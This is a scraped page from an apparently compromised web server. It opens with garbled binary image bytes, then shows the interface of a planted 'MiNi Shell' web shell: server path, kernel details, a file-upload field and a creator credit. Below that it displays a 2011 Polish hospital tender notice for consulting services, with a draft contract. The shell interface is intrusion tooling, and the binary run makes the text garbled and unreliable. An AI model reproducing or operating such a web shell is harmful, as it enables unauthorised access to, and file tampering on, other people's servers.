JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110506/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110506/103098-N-2011.html

<p class="kh_header"><b>Nowy Targ: Usługa- doradztwa w Podhalańskim Szpitalu specjalistycznym im. Jana Pawła II w Nowym Targu</b><br>
<b>Numer ogłoszenia: 103098 - 2011; data zamieszczenia: 06.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Podhalański Szpital Specjalistyczny im. Jana Pawła II w Nowym Targu , ul. Szpitalna 14, 34-400 Nowy Targ, woj. małopolskie, tel. 018 2633060, 2633061, faks 018 2633952, 2633950.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pszs.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa- doradztwa w Podhalańskim Szpitalu specjalistycznym im. Jana Pawła II w Nowym Targu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługa- doradztwa w Podhalańskim Szpitalu specjalistycznym im. Jana Pawła II w Nowym Targu w szczególności w zakresie:
a)	doradztwa w zarządzaniu w zakresie działalności podstawowej Zamawiającego,
b)	monitorowania kosztów działalności oraz podejmowaniu wraz z Zamawiającym niezbędnych działań zmierzających do zbilansowania działalności bieżącej,
c)	restrukturyzacji wymagalnych i niewymagalnych zobowiązań cywilnoprawnych, 
d)	prowadzenia negocjacji z wierzycielami w zakresie restrukturyzacji finansowej Zamawiającego,  
e)	sporządzania symulacji i opracowań finansowych niezbędnych w procesie racjonalizacji kosztów, budżetowaniu ( w tym m. in. limitowaniu kosztów oddziałów i innych komórek medycznych),
f)	opracowania założeń niezbędnych do wprowadzenia budżetowania i wprowadzenie,
g)	optymalizacji polityki lekowej Zamawiającego,
h)	benchmarkingu (zatrudnienia, koszty leków i sprzętu jednorazowego użytku, koszty realizacji świadczeń itp.).
i)	optymalizacji zarządzania polityką zakupów i dostaw,
j)	optymalizacji zatrudnienia, negocjacji ze związkami zawodowymi,
k)	określania możliwości zwiększenia przychodów z działalności podstawowej w  ramach zawartych umów z NFZ  oraz pozostałej działalności,
l)	określania możliwości inwestycyjnych i modernizacyjnych aktywów trwałych Zamawiającego mających na celu doprowadzenie do zbilansowania bieżącej działalności,
m)	opracowania założeń do przekształcenia SP ZOZ w spółkę zgodnie z ustawą o działalności leczniczej wraz z symulacją dotyczącą wsparcia procesu przekształcenia ze środków budżetu państwa,
n)	pomoc w opracowaniu dokumentów niezbędnych do uzyskania (w razie potrzeby pożyczek bądź kredytów, programy restrukturyzacyjne, projekty finansowe)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.41.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w niniejszym postępowaniu nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający będzie dokonywał oceny spełniania warunku na podstawie złożonego oświadczenia na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Należycie wykonali lub wykonują w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia jest krótszy w tym okresie- minimum trzy usługi obejmujące swym zakresem przedmiot postępowania tj. usługę doradztwa w zarządzaniu samodzielnymi publicznymi zakładami opieki zdrowotnej, w których doradztwo było prowadzone na podstawie umowy przez okres co najmniej 12 miesięcy.
Zamawiający będzie dokonywał oceny spełniania warunku na podstawie złożonych dokumentów na zasadzie spełnia/nie spełnia),</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający będzie dokonywał oceny spełniania warunku na podstawie złożonego oświadczenia na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający będzie dokonywał oceny spełniania warunku na podstawie złożonego oświadczenia na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający będzie dokonywał oceny spełniania warunku na podstawie złożonego oświadczenia na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo, jeżeli będzie miała miejsce sytuacja opisana w specyfikacji.
2. Formularz cenowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Umowa została zawarta na podstawie przeprowadzonego postępowania przetargowego na
warunkach określonych w postępowaniu - art. 39 ustawy Prawo zamówień publicznych 
(Dz. U. nr 19 z 2004 roku poz. 177 z późn. zmianami) - numer postępowania przetargowego ZP-271-18/11.
2.	Przedmiotem umowy jest usługa w zakresie doradztwa w zarządzaniu Podhalańskim Szpitalem Specjalistycznym im. J. Pawła II w Nowym Targu- ul. Szpitalna 14.
3.	W ramach przedmiotu umowy Wykonawca zobowiązuje się do świadczenia usług polegających m. in. na:
a)	doradztwie w zarządzaniu w zakresie działalności podstawowej Zamawiającego,
b)	monitorowaniu kosztów działalności oraz podejmowaniu wraz z Zamawiającym niezbędnych działań zmierzających do zbilansowania działalności bieżącej,
c)	restrukturyzacji wymagalnych i niewymagalnych zobowiązań cywilnoprawnych, 
d)	prowadzeniu negocjacji z wierzycielami w zakresie restrukturyzacji finansowej Zamawiającego,  
e)	sporządzaniu symulacji i opracowań finansowych niezbędnych w procesie racjonalizacji kosztów, budżetowaniu ( w tym m. in. limitowaniu kosztów oddziałów i innych komórek medycznych),
f)	opracowaniu założeń niezbędnych do wprowadzenia budżetowania i wprowadzenie,
g)	optymalizacji polityki lekowej Zamawiającego,
h)	benchmarkingu (zatrudnienia, koszty leków i sprzętu jednorazowego użytku, koszty realizacji świadczeń itp.).
i)	optymalizacji zarządzania polityką zakupów i dostaw,
j)	optymalizacji zatrudnienia, negocjacji ze związkami zawodowymi,
k)	określaniu możliwości zwiększenia przychodów z działalności podstawowej w  ramach zawartych umów z NFZ  oraz pozostałej działalności,
l)	określaniu możliwości inwestycyjnych i modernizacyjnych aktywów trwałych Zamawiającego mających na celu doprowadzenie do zbilansowania bieżącej działalności,
m)	opracowaniu założeń do przekształcenia SP ZOZ w spółkę zgodnie z ustawą o działalności leczniczej wraz z symulacją dotyczącą wsparcia procesu przekształcenia ze środków budżetu państwa,
n)	pomoc w opracowaniu dokumentów niezbędnych do uzyskania (w razie potrzeby pożyczek bądź kredytów, programy restrukturyzacyjne, projekty finansowe).
4.	Zamawiający zobowiązuje się dostarczyć Wykonawcy wszelkie konieczne dokumenty oraz informacje celem należytego wykonania zlecenia.

§2
1. Wykonawcy za wykonanie czynności określonych w § 1 przysługuje comiesięczne wynagrodzenie ryczałtowe w wysokości ....................zł netto (słownie:..........................), płatne w terminie do 30 dni od daty otrzymania przez Zamawiającego faktury VAT.
2. Wynagrodzenie będzie powiększone o obowiązującą stawkę podatku VAT.
3. Zapłata za usługę następować będzie w formie przelewu bankowego na konto Wykonawcy.
.................. w banku.......................
4.Za datę zapłaty przyjmuje się datę obciążenia rachunku bankowego Zamawiającego.
5.Warunkiem zapłaty wynagrodzenia o jakim mowa w ust. 1 jest przedłożenie przez
Wykonawcę sprawozdania z wykonanych czynności w formie pisemnej, Zamawiającemu na co najmniej 5 dni przed datą złożenia faktury. Sprawozdanie winno zostać zaakceptowane przez Zamawiającego.
						§3  
1. Umowę zawarta na okres 6 miesięcy od dnia zawarcia umowy od..........do........
2. Wykonawca w ramach niniejszej umowy zobowiązuje się do wykonywania przedmiotowej usługi przez wszystkie dni powszednie (poniedziałek- piątek w godzinach pracy Zamawiającego). Wykonanie usługi nastąpi w siedzibie Wykonawcy, za pośrednictwem drogi telefonicznej, fax-u oraz poczty elektronicznej oraz w siedzibie Zamawiającego poprzez osobiste wizyty osób reprezentujących- Wykonawcę co najmniej jeden dzień w tygodniu (w godzinach pracy dyrekcji).
§4
1.	Wykonawca oświadcza, że przedmiot umowy będzie realizował samodzielnie/w części .........., całości przez podwykonawcę/ ów.
2.	Za realizację umowy odpowiedzialność ponosi Wykonawca.

§5	
1.Zamawiający dopuszcza możliwość:
a)	przekształcenia nazwy i innych danych identyfikacyjnych Zamawiającego lub Wykonawcy (w przypadku zmiany tych danych)
b)	rezygnacji Wykonawcy z powierzenia wykonania części/całości umowy podwykonawcy, (JEŻELI W REALIZACJI UMOWY UCZESTNICZYĆ BĘDZIE PODWYKONAWCA) - w przypadku takiej rezygnacji,
c)	sprecyzowanie zapisu w §1 ust. 3 pkt m co do oznaczenia powołanej w nim ustawy po wejściu w życie jej przepisów.
2.Zmiana, o której mowa w ust. 1 pkt a,b musi być odpowiednio udokumentowana przez każdą ze stron i obowiązuje po podpisaniu aneksu przez obie strony.


§6
1. Wszelkie informacje przekazane w związku z wykonaniem umowy stanowią tajemnicę stron w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993r o zwalczaniu nieuczciwej konkurencji (Dz. U. nr 47 poz. 2110.
Informacje o jakich mowa w ust. 1 przekazane w jakiejkolwiek formie przez stronę drugiej stronie, mogą być użyte przez stronę odbierającą tylko w celu spełnienia swoich zobowiązań wynikających z niniejszej umowy i nie mogą być wykorzystywane i ujawnione osobom trzecim bez zgody strony, której te informacje dotyczą.
2. Strona utrzyma w tajemnicy wiedzę i dokumentację otrzymaną od drugiej strony w ramach niniejszej umowy, z wyjątkiem informacji ogólnie znanych w branży i zgadza się na użycie tej wiedzy i dokumentacji wyłącznie dla celów określonych w niniejszej umowie. Wykonawca jest uprawniony do prezentowania materiałów przygotowanych w ramach niniejszej umowy przez Zamawiającego organowi założycielskiemu oraz swoim pracownikom.
						§7
1. Zamawiający może rozwiązać umowę bez wypowiedzenia ze skutkiem natychmiastowym w przypadku naruszenia przez Wykonawcę istotnych warunków umowy, polegających na:
o)	trzykrotnym niestawiennictwie Wykonawcy w siedzibie Zamawiającego, o którym mowa w § 3 ust. 2.
p)	zaprzestaniu  kontaktów z Zamawiającym- telefonicznych, faksowych, e- mailowych w okresie dłuższym niż 2 tygodnie.
2.Wykonawca zapłaci Zamawiającemu karę w wysokości 10% - z 6-cio  miesięcznej wartości brutto umowy w przypadku odstąpienia przez Zamawiającego bądź przez Wykonawcę od niniejszej umowy z przyczyn leżących po stronie Wykonawcy.
3.	Zamawiający może odstąpić od niniejszej umowy w trybie i na zasadach określonych w art. 145 ustawy Prawo zamówień publicznych.

§8 
Wykonawca jako wierzyciel z tytułu niniejszej umowy oświadcza, że nie przeniesie wierzytelności wynikającej z  niniejszej umowy na osoby trzecie bez zgody zamawiającego.

§9
W sprawach nie uregulowanych w umowie zastosowanie ma Kodeks cywilny o ile ustawa Prawo zamówień publicznych nie stanowi inaczej.
				
§10
Sądem właściwym dla rozstrzygnięcia ewentualnych sporów z umowy będzie Sąd miejscowo właściwy dla Zamawiającego. 

						§11
Umowę sporządzono w czterech jednobrzmiących egzemplarzach, trzy dla Zamawiającego i jeden dla Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pszs.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sekcja Zamówień Publicznych Zamawiającego- Podhalański Szpital Specjalistyczny im. Jana Pawła II w Nowym Targu- ul. Szpitalna 14, pok. nr 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.05.2011 godzina 10:00, miejsce: Dziennik Podawczy Zamawiającego- Podhalański Szpital Specjalistyczny im. Jana Pawła II w Nowym Targu- ul. Szpitalna 14, pok. nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com